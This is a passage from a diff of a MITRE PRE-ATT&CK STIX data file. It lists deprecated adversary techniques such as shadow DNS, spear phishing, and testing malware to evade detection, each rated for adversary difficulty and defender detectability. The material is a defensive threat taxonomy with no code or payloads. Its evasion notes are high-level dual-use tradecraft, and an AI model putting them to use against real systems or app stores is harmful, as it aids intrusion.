"x_mitre_old_attack_id": "PRE-T1115", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--cc0faf66-4df2-4328-9c9c-b0ca5de915ad", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Secure and protect infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1317).\n\nAn adversary may secure and protect their infrastructure just as defenders do. This could include the use of VPNs, security software, logging and monitoring, passwords, or other defensive measures. (Citation: KrebsTerracottaVPN)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1317", + "external_id": "T1317" + }, + { + "source_name": "KrebsTerracottaVPN", + "description": "Brian Krebs. (2014, August 4). Chinese VPN Service as Attack Platform?. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Indistinguishable from standard security practices employed by legitimate operators.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary benefits from our own advances, techniques, and software when securing and protecting their own development infrastructure.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1094", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--3f157dee-74f0-41fc-801e-f837b8985b0a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Shadow DNS", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1340).\n\nThe process of gathering domain account credentials in order to silently create subdomains pointed at malicious servers without tipping off the actual owner. (Citation: CiscoAngler) (Citation: ProofpointDomainShadowing)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1340", + "external_id": "T1340" + }, + { + "source_name": "CiscoAngler", + "description": "Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017.", + "url": "https://blogs.cisco.com/security/talos/angler-domain-shadowing" + }, + { + "source_name": "ProofpointDomainShadowing", + "description": "Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1117", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "To successfully conduct this attack, an adversary usually phishes the individual behind the domain registrant account, logs in with credentials, and creates a large amount of subdomains.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Detection of this technique requires individuals to monitor their domain registrant accounts routinely. In addition, defenders have had success with blacklisting sites or IP addresses, but an adversary can defeat this by rotating either the subdomains or the IP addresses associated with the campaign.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--e24a9f99-cb76-42a3-a50b-464668773e97", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Spear phishing messages with malicious attachments", + "description": "**This technique has been deprecated. Please use [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).**\n\nEmails with malicious attachments are designed to get a user to open/execute the attachment in order to deliver malware payloads. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1367", + "url": "https://attack.mitre.org/techniques/T1367" + }, + { + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017.", + "source_name": "APT1" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:25:35.837Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1144", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Sending the emails is the simple part, ensuring they make it to the target (e.g., not being filtered) may be challenging. Over time, an adversary refines their techniques to minimize detection by making their emails seem legitimate in structure and content.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Many technologies exist to scan content and/or emulate a workstation prior to the target receiving and executing the attachment (detonation chambers) in order to reduce malicious emails and attachments being delivered to the intended target. However, encryption continues to be a stumbling block. In addition, there are a variety of commercial technologies available that enable users to screen for phishing messages and which are designed to enhance email security.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1369", + "url": "https://attack.mitre.org/techniques/T1369" + }, + { + "description": "Nick Johnston. (2014, March 13). Google Docs Users Targeted by Sophisticated Phishing Scam. Retrieved March 29, 2017.", + "source_name": "GoogleDrive Phishing" + }, + { + "description": "Bob Griffin. (2015, May 16). THE ON-GOING THREAT OF SOCIAL ENGINEERING. Retrieved March 9, 2017.", + "source_name": "RSASEThreat" + } + ], + "description": "**This technique has been deprecated. Please use [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002).**\n\nEmails with malicious links are designed to get a user to click on the link in order to deliver malware payloads. (Citation: GoogleDrive Phishing) (Citation: RSASEThreat)", + "name": "Spear phishing messages with malicious links", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--489a7797-01c3-4706-8cd1-ec56a9db3adc", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:25:58.783Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses_explanation": "Defenders can implement mechanisms to analyze links and identify levels of concerns. However, the adversary has the advantage of creating new links or finding ways to obfuscate the link so that common detection lists can not identify it. Detection of a malicious link could be identified once the file has been downloaded.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Sending emails is trivial and expected. The adversary needs to ensure links don't get tampered, removed, or flagged as a previously black-listed site.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1146" + }, + { + "id": "attack-pattern--2fc04aa5-48c1-49ec-919a-b88241ef1d17", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Spear phishing messages with text only", + "description": "**This technique has been deprecated. Please use [Phishing](https://attack.mitre.org/techniques/T1566) where appropriate.**\n\nEmails with text only phishing messages do not contain any attachments or links to websites. They are designed to get a user to take a follow on action such as calling a phone number or wiring money. They can also be used to elicit an email response to confirm existence of an account or user. (Citation: Paypal Phone Scam)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1368", + "url": "https://attack.mitre.org/techniques/T1368" + }, + { + "description": "Sophos Labs. (2006, July 7). PayPal phone phish scam uses voice recording to steal money. Retrieved March 29, 2017.", + "source_name": "Paypal Phone Scam" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:26:25.555Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1145", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Sending messages with text only should be accepted in most cases (e.g., not being filtered based on source, content).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "End user training and awareness is the primary defense for flagging a plain text email so the end user does not respond or take any requested action (e.g., calling a designated number).", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--b182f29c-2505-4b32-a000-0440ef189f59", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Spearphishing for Information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1397).\n\nSpearphishing for information is a specific variant of spearphishing. Spearphishing for information is different from other forms of spearphishing in that it it doesn't leverage malicious code. All forms of spearphishing are elctronically delivered social engineering targeted at a specific individual, company, or industry. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials, without involving malicious code. Spearphishing for information frequently involves masquerading as a source with a reason to collect information (such as a system administrator or a bank) and providing a user with a website link to visit. The given website often closely resembles a legitimate site in appearance and has a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Spearphishing for information may also try to obtain information directly through the exchange of emails, instant messengers or other electronic conversation means. (Citation: ATTACKREF GRIZZLY STEPPE JAR)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1397", + "external_id": "T1397" + }, + { + "source_name": "ATTACKREF GRIZZLY STEPPE JAR", + "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE \u2013 Russian Malicious Cyber Activity. Retrieved January 11, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2018-04-18T17:59:24.739Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1174", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Sending emails is trivial, and, over time, an adversary can refine their technique to minimize detection by making their emails seem legitimate in structure and content.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Depending on the specific method of phishing, the detections can vary. For emails, filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. When it comes to following links, network intrusion detection systems (NIDS), firewalls, removing links, exploding shortened links, proxy monitoring, blocking uncategorized sites, and site reputation based filtering can all provide detection opportunities.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--03da0598-ed46-4a73-bf43-0313b3522400", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Submit KITs, KIQs, and intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1237).\n\nOnce they have been created, intelligence requirements, Key Intelligence Topics (KITs), and Key Intelligence Questions (KIQs) are submitted into a central management system. (Citation: ICD204) (Citation: KIT-Herring)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1237", + "external_id": "T1237" + }, + { + "source_name": "ICD204", + "description": "Office of the Director of National Intelligence. (2015, January 02). Retrieved March 5, 2017." + }, + { + "source_name": "KIT-Herring", + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1014", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-direction" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--72923cae-6c8c-4da2-8f48-b73389529c25", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Targeted client-side exploitation", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique used to compromise a specific group of end users by taking advantage of flaws in client-side applications. For example, infecting websites that members of a targeted group are known to visit with the goal to infect a targeted user's computer. (Citation: RSASEThreat) (Citation: WikiStagefright) (Citation: ForbesSecurityWeek) (Citation: StrongPity-waterhole)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1371", + "url": "https://attack.mitre.org/techniques/T1371" + }, + { + "description": "Bob Griffin. (2015, May 16). THE ON-GOING THREAT OF SOCIAL ENGINEERING. Retrieved March 9, 2017.", + "source_name": "RSASEThreat" + }, + { + "description": "Wikipedia contributors. (2017, March 8). Stagefright (bug). Retrieved March 9, 2017.", + "source_name": "WikiStagefright" + }, + { + "description": "Fahmida Y. Rashid. (2015, February 11). Chinese Attackers Hacked Forbes Website in Watering Hole Attack: Security Firms. Retrieved March 7, 2017.", + "source_name": "ForbesSecurityWeek" + }, + { + "description": "Kurt Baumgartner. (2016, October 3). On the StrongPity Waterhole Attacks Targeting Italian and Belgian Encryption Users. Retrieved May 9, 2017.", + "source_name": "StrongPity-waterhole" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:26:52.970Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1148", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Commonly executed technique to place an exploit on an often widely used public web site intended for driveby delivery. The additional challenge is the reduced set of options for web sites to compromise since the set is reduced to those often visited by targets of interest.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defensive technologies exist to scan web content before delivery to the requested end user. However, this is not foolproof as some sites encrypt web communications and the adversary constantly moves to sites not previously flagged as malicious thus defeating this defense. Host-based defenses can also aid in detection/mitigation as well as detection by the web site that got compromised. The added challenge for a conditional watering hole is the reduced scope and likely reduced ability to detect or be informed. Determining deltas in content (e.g., differences files type/size/number/hashes) downloaded could also aid in detection.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + }, + { + "id": "attack-pattern--eb517589-eefc-480e-b8e3-7a8b1066f6f1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Targeted social media phishing", + "description": "**This technique has been deprecated. Please use [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003).**\n\nSending messages through social media platforms to individuals identified as a target. These messages may include malicious attachments or links to malicious sites or they may be designed to establish communications for future actions. (Citation: APT1) (Citation: Nemucod Facebook)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1366", + "url": "https://attack.mitre.org/techniques/T1366" + }, + { + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017.", + "source_name": "APT1" + }, + { + "description": "Bart Blaze. (2016, November 20). Nemucod downloader spreading via Facebook. Retrieved March 28, 2017.", + "source_name": "Nemucod Facebook" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:27:43.972Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1143", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Sending messages to individuals identified as a target follows normal tradecraft for using social media.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Extremely hard to identify (in the launch phase) what message via social media is hostile versus what is not. Increased use of encrypted communications increases the difficulty average defender's have in detecting use of this technique.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--b93bd611-da4e-4c84-a40f-325b712bed67", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Task requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1240).\n\nOnce divided into the most granular parts, analysts work with collection managers to task the collection management system with requirements and sub-requirements. (Citation: Heffter) (Citation: JP2-01)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1240", + "external_id": "T1240" + }, + { + "source_name": "Heffter", + "description": "Clyde R. Heffter. (2011, August 4). A Fresh Look at Collection Requirements. Retrieved March 2, 2017." + }, + { + "source_name": "JP2-01", + "description": "Joint Chiefs of Staff. (2012, January 05). Joint and National Intelligence Support to Military Operations. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1017", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-direction" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--c9e85b80-39e8-42df-b275-86a2afcea9e8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test ability to evade automated mobile application security analysis performed by app stores", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1393).\n\nMany mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). An adversary can submit multiple code samples to these stores deliberately designed to probe the stores' security analysis capabilities, with the goal of determining effective techniques to place malicious applications in the stores that could then be delivered to targeted devices. (Citation: Android Bouncer) (Citation: Adventures in BouncerLand) (Citation: Jekyll on iOS) (Citation: Fruit vs Zombies)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1393", + "external_id": "T1393" + }, + { + "source_name": "Android Bouncer", + "description": "Jon Oberheide and Charlie Miller. (2012). DISSECTING THE ANDROID BOUNCER. Retrieved April 12, 2017." + }, + { + "source_name": "Adventures in BouncerLand", + "description": "Nicholas J. Percoco and Sean Schulte. (2012). Adventures in BouncerLand. Retrieved April 12, 2017." + }, + { + "source_name": "Jekyll on iOS", + "description": "Tielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke Lee. (2013). Jekyll on iOS: When Benign Apps Become Evil. Retrieved April 12, 2017." + }, + { + "source_name": "Fruit vs Zombies", + "description": "Claud Xiao. (2016). Fruit vs Zombies: Defeat Non-jailbroken iOS Malware. Retrieved April 12, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The app store operators (e.g., Apple and Google) may detect the attempts, but it would not be observable to those being attacked.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can submit code remotely using throwaway accounts, although a registration fee may need to be paid for each new account (e.g., $99 for Apple and $25 for Google Play Store).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1170", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--0649fc36-72a0-40a0-a2f9-3fc7e3231ad6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test callback functionality", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1356).\n\nCallbacks are malware communications seeking instructions. An adversary will test their malware to ensure the appropriate instructions are conveyed and the callback software can be reached. (Citation: LeeBeaconing)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1356", + "external_id": "T1356" + }, + { + "source_name": "LeeBeaconing", + "description": "Tony Lee. (2012, December 11). Testing Your Defenses - Beaconing. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary controls the test and defender likely has no visibility.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary controls or acquires all pieces of infrastructure and can test outside of defender's visibility.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1133", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--e042a41b-5ecf-4f3a-8f1f-1b528c534772", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test malware in various execution environments", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1357).\n\nMalware may perform differently on different platforms (computer vs handheld) and different operating systems ([Ubuntu](http://www.ubuntu.com) vs [OS X](http://www.apple.com/osx)), and versions ([Windows](http://windows.microsoft.com) 7 vs 10) so malicious actors will test their malware in the environment(s) where they most expect it to be executed. (Citation: BypassMalwareDefense)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1357", + "external_id": "T1357" + }, + { + "source_name": "BypassMalwareDefense", + "description": "Morton Christiansen. (2010, May 7). Bypassing Malware Defenses. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary controls the test and defender likely has no visibility.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary can simulate most environments (e.g., variable operating systems, patch levels, application versions) with details available from other techniques.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1134", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--8b57a8f1-9cbc-4b95-b162-cc2a1add94f2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test malware to evade detection", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1359).\n\nAn adversary can run their code on systems with cyber security protections, such as antivirus products, in place to see if their code is detected. They can also test their malware on freely available public services. (Citation: MalwareQAZirtest)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1359", + "external_id": "T1359" + }, + { + "source_name": "MalwareQAZirtest", + "description": "Damballa Day Before Zero Blog. (2009, December 17). Malware QA and Exploit Testing Services \u2013 Virtest.com. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary controls the testing and can ensure data does not leak with proper OPSEC on testing.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has the ability to procure products and not have reporting return to vendors or can choose to use freely available services", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1136", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--18bfa01c-9fa9-409f-91f5-4a2822609d81", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test physical access", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1360).\n\nAn adversary can test physical access options in preparation for the actual attack. This could range from observing behaviors and noting security precautions to actually attempting access. (Citation: OCIAC Pre Incident Indicators) (Citation: NewsAgencySpy)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1360", + "external_id": "T1360" + }, + { + "source_name": "OCIAC Pre Incident Indicators", + "description": "Orange County Intelligence Assessment Center. (n.d.). Pre-Incident Indicators. Retrieved March 28, 2017." + }, + { + "source_name": "NewsAgencySpy", + "description": "The Canadian Press. (2012, August 22). Reporter says Chinese news agency asked him to spy. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defender often install badging, cameras, security guards or other detection techniques for physical security and monitoring.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires a physical presence in the space being entered and increased risk of being detected/detained (e.g., recorded on video camera)", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1137", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--57061a8a-d7c5-42a9-be60-f79526b95bf6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test signature detection", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1292).\n\nAn adversary can test the detections of malicious emails or files by using publicly available services, such as virus total, to see if their files or emails cause an alert. They can also use similar services that are not openly available and don't publicly publish results or they can test on their own internal infrastructure. (Citation: WiredVirusTotal)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1292", + "external_id": "T1292" + }, + { + "source_name": "WiredVirusTotal", + "description": "Kim Zetter. (14, September 2). A Google Site Meant to Protect You Is Helping Hackers Attack You. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "If using a common service like [https://www.virustotal.com VirusTotal], it is possible to detect. If the adversary uses a hostile, less well-known 